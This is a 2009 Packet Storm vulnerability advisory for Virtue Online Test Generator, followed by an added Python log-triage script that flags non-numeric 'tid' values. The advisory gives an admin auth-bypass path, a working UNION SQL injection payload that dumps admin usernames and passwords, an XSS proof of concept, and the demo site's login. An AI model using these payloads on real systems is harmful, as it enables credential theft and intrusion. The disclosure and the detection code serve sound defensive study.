Virtue Online Test Generator XSS / SQL Injection

2009-06-26T00:00:00
ID PACKETSTORM:78679
Type packetstorm
Reporter HxH
Modified 2009-06-26T00:00:00

Description

                                        
```
+===================================================================================+
| |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities |
| |
+===================================================================================+
| |
| Author.: HxH |
| Contact: HxH[at]live[dot]at |
| |
+===================================================================================+
| |
| Script.: Virtue Online Test Generator |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php |
| |
+-----------------------------------------------------------------------------------+
| |
| Exploit: After user login |
| |
| [+] Auth Bypass |
| |
| http://[website]/[script]/admin/index.php |
| |
| [+] SQLi |
| |
| http://[website]/[script]/text.php?tid=[SQL] |
| |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- |
| |
| [+] XSS |
| |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script> |
| |
+-----------------------------------------------------------------------------------+
| |
| Demo...: http://www.virtuenetz.com/exam |
| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo |
| |
+===================================================================================+
| |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist |
| |
+===================================================================================+
```
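
Added log-triage example, not part of the original advisory or the vendor's code: the SQLi and XSS entries both go through the `tid` parameter of text.php, so flagging every request whose decoded `tid` is not a plain integer covers both. It assumes `tid` is meant to be a numeric test id and that the web server writes common-log-format lines; the sample lines, client addresses and `/exam/` prefix are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format). Client addresses and the
# /exam/ prefix are placeholders; the two payloads are the advisory's own.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Jun/2009:10:00:01 +0000] "GET /exam/text.php?tid=12 HTTP/1.1" 200 5120
198.51.100.9 - - [26/Jun/2009:10:00:05 +0000] "GET /exam/text.php?tid=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- HTTP/1.1" 200 812
198.51.100.9 - - [26/Jun/2009:10:00:09 +0000] "GET /exam/text.php?tid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 790
198.51.100.7 - - [26/Jun/2009:10:00:12 +0000] "GET /exam/index.php HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_HINT = re.compile(r"\b(?:union|select)\b|--|'", re.I)
MARKUP_HINT = re.compile(r"[<>\"]")

def classify_tid(value):
    """Return None for a plain integer id, otherwise a triage label."""
    if re.fullmatch(r"\d+", value):  # assumption: tid is a numeric test id
        return None
    if SQL_HINT.search(value):
        return "sql-syntax"
    if MARKUP_HINT.search(value):
        return "markup"
    return "non-numeric"

def audit(log_text):
    """Return (client, label, decoded tid) for each suspicious text.php hit."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/text.php"):
            continue
        # parse_qs URL-decodes and returns every repeated tid value
        for value in parse_qs(url.query, keep_blank_values=True).get("tid", []):
            label = classify_tid(value)
            if label:
                findings.append((client, label, value))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches the query or the page, is what closes both issues; the log check only shows who has been probing the parameter.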